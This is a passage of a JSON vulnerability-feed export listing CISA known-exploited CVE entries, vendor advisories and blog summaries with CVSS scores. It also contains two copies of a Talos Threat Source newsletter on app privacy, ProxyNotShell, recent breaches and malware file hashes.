"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-10-20T00:00:00", "id": "CISA-KEV-CVE-2022-41352", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-29T18:46:08", "description": "Apple iOS and macOS contain an out-of-bounds write vulnerability that could allow an application to execute code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-18T00:00:00", "type": "cisa_kev", "title": "Apple iOS and macOS Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-08-18T00:00:00", "id": "CISA-KEV-CVE-2022-32894", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T22:36:14", "description": "Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows COM+ Event System Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T00:00:00", "id": "CISA-KEV-CVE-2022-41033", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T20:52:07", "description": "Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "cisa_kev", "title": "Fortinet Multiple Products Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-11T00:00:00", "id": "CISA-KEV-CVE-2022-40684", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-28T22:29:33", "description": "A code injection vulnerability in the User Portal and Webadmin of Sophos Firewall allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T00:00:00", "type": "cisa_kev", "title": "Sophos Firewall Code Injection Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-23T00:00:00", "id": "CISA-KEV-CVE-2022-3236", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2022-10-03T06:04:27", "description": "By [Deeba Ahmed](<https://www.hackread.com/author/deeba/>)\n\nThe latest attack against Exchange servers utilizes at least two new flaws (CVE-2022-41040, CVE-2022-41082) that have been assigned CVSS scores of 6.3 and 8.8.\n\nThis is a post from HackRead.com Read the original post: [Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers](<https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T17:56:35", "type": "hackread", "title": "Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T17:56:35", "id": "HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36", "href": "https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T22:13:45", "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nThe flaw is tracked as CVE-2022-40684 in FortiOS, while its exploit is being sold on a popular Russian hacker forum.\n\nThis is a post from HackRead.com Read the original post: [Critical Flaw Exploited to Bypass Fortinet Products and Compromise Orgs](<https://www.hackread.com/authentication-bypass-flaw-fortinet-products/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-28T20:17:04", "type": "hackread", "title": "Critical Flaw Exploited to Bypass Fortinet Products and Compromise Orgs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-11-28T20:17:04", "id": "HACKREAD:2EBD89813F12BF96F813DB942560BD69", "href": "https://www.hackread.com/authentication-bypass-flaw-fortinet-products/", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2022-10-04T22:41:31", "description": "Akamai Security Research has released web application firewall protections for Microsoft Exchange CVE-2022-41040 and CVE-2022-41082.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T09:00:00", "type": "akamaiblog", "title": "Akamai?s Response to Zero-Day Vulnerabilities in Microsoft Exchange Server (CVE-2022-41040 and CVE-2022-41082)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T09:00:00", "id": "AKAMAIBLOG:0287B84AF09C377FDC8D475774722858", "href": "https://www.akamai.com/blog/security-research/akamais-response-zero-day-vulnerabilities-microsoft-exchange-server", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T15:20:24", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2022-41082; CVE-2022-41040)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T00:00:00", "id": "CPAI-2022-0628", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-24T15:04:13", "description": "A remote code execution vulnerability exists in multiple Zoho products. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-23T00:00:00", "type": "checkpoint_advisories", "title": "Zoho Multiple Products Remote Code Execution (CVE-2022-35405)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-10-23T00:00:00", "id": "CPAI-2022-0617", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-24T15:04:01", "description": "An authentication bypass vulnerability exists in multiple Fortinet products. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-23T00:00:00", "type": "checkpoint_advisories", "title": "Fortinet Multiple Products Authentication Bypass (CVE-2022-40684)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-23T00:00:00", "id": "CPAI-2022-0720", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-10-06T19:13:58", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n \n\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I\u2019ve been [diving a lot into apps\u2019 privacy policies](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>) recently. And I was recently made aware of a new type of app I never knew existed \u2014 family trackers. \n\n \n\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me \u2014 it\u2019d be a supped-up version of Find my Friends on Apple devices so I\u2019d never have to ask my teenager (granted, I\u2019m many years away from being at that stage of my life) when they were coming home or where they were. \n\n \n\n\nJust as with all other types of mobile apps, there are pitfalls, though. \n\n \n\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>) on its users, potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn\u2019t intend to let adversaries see this information, they don\u2019t have direct control over how those third parties handle the information once it\u2019s sold off. \n\n \n\n\nThe [app\u2019s current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes.\u201d However, users do have the ability to opt out of this inside the app. \n\n \n\n\nThere is hardware that offers this same type of tracking. Jealous, angry or paranoid spouses and parents have used [Apple\u2019s AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags\u2019 security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings. \n\n \n\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children\u2019s safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we\u2019ve said before, [no one truly has \u201cnothing to hide,\u201d](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I\u2019m not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it\u2019s worth considering what sacrifices we might be making elsewhere. \n\n \n\n\n \n\n\n## The one big thing \n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n\n> ### Why do I care? \n> \n> Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year. \n> \n> ### So now what?\n\n> While no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.darkreading.com/remote-workforce/microsoft-updates-mitigation-for-exchange-server-zero-days>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. While Microsoft continues to update their mitigations, some security researchers [posit they can be bypassed](<https://twitter.com/GossiTheDog/status/1575813395835547651>). Talos has released several Snort rules to detect the exploitation of these vulnerabilities and associate malware families used in these attacks. \n\n> \n\n## Top security headlines from the week\n\n \n\n\nMore than 2 million Australians\u2019 personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company\u2019s CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver\u2019s license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>)) \n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>)) \n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * * _[Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)_\n * _[Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)_\n * _[Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)_\n * _[Talos Takes Ep. #115: An \"insider threat\" doesn't always have to know they're a threat](<https://www.buzzsprout.com/2018149/episodes/11413990>)_\n * _[Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)_\n * _[Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>)_\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**_[Cisco Security Solution Expert Sessions](<https://web.cvent.com/event/f150cd18-061b-4c25-b617-044c50cac855/summary>)_ (Oct. 11 &amp; 13)**\n\nVirtual \n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 18 - 20)**\n\nSands Expo &amp; Convention Centre, Singapore \n\n \n\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>) _**** (Oct. 20 - 21)**\n\nSands Capital Management, Arlington, Virginia \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>) \n\n**MD5: **8c69830a50fb85d8a794fa46643493b2 \n\n**Typical Filename: **AAct.exe \n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681](<https://www.virustotal.com/gui/file/58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681/details>) \n\n**MD5: **f1fe671bcefd4630e5ed8b87c9283534 \n\n**Typical Filename: **KMSAuto Net.exe \n\n**Claimed Product: **KMSAuto Net \n\n**Detection Name: **PUA.Win.Tool.Hackkms::1201 \n\n** \n**\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>)** **\n\n**MD5: **a087b2e6ec57b08c0d0750c60f96a74c\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201 \n\n** \n**\n\n**SHA 256: **[63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n\n**MD5: **a779d230c944ef200bce074407d2b8ff \n\n**Typical Filename: **mediaget.exe** **\n\n**Claimed Product: **MediaGet \n\n**Detection Name: **W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:12103F398364269083FD96139F0F6562", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-6-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T20:49:32", "description": "\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I&#x27;ve been [diving a lot into apps&#x27; privacy policies recently](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>). And I was recently made aware of a new type of app I never knew existed -- family trackers.\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me -- it&#x27;d be a supped-up version of Find my Friends on Apple devices so I&#x27;d never have to ask my teenager (granted, I&#x27;m many years away from being at that stage of my life) when they were coming home or where they were.\n\nJust as with all other types of mobile apps, there are pitfalls, though.\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data on its users](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>), potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn&#x27;t intend to let adversaries see this information, they don&#x27;t have direct control over how those third parties handle the information once it&#x27;s sold off.\n\nThe [app&#x27;s current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes,&quot; though users do have the ability to opt out of this inside the app.\n\nThere is hardware that offers this same type of tracking. Jealous, angry or paranoid spouses and parents have [used Apple&#x27;s AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags&#x27; security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings.\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children&#x27;s safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we&#x27;ve said before, [no one truly has &quot;nothing to hide,&quot;](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I&#x27;m not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it&#x27;s worth considering what sacrifices we might be making elsewhere. \n\n\n## The one big thing\n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.\n\n## Top security headlines from the week \n\n\nMore than 2 million Australians&#x27; personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company&#x27;s CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver&#x27;s license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>))\n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>))\n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>))\n\n## Can&#x27;t get enough Talos?\n\n * [Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)\n * [Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)\n * [Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)\n * [Talos Takes Ep. #115: An \"insider threat\" ](<https://www.buzzsprout.com/2018149/episodes/11413990>)doesn't always have to know they're a threat\n * [Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)\n * [Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>) \n\n\n## Upcoming events where you can find Talos \n\n\n[_**Cisco Security Solution Expert Sessions**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 11 &amp; 13)** \nVirtual \n\n \n[_**GovWare 2022**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 18 - 20)** \nSands Expo &amp; Convention Centre, Singapore \n\n \n[_**Conference On Applied Machine Learning For Information Security**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)_** **_**(Oct. 20 - 21)** \nSands Capital Management, Arlington, Virginia", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing 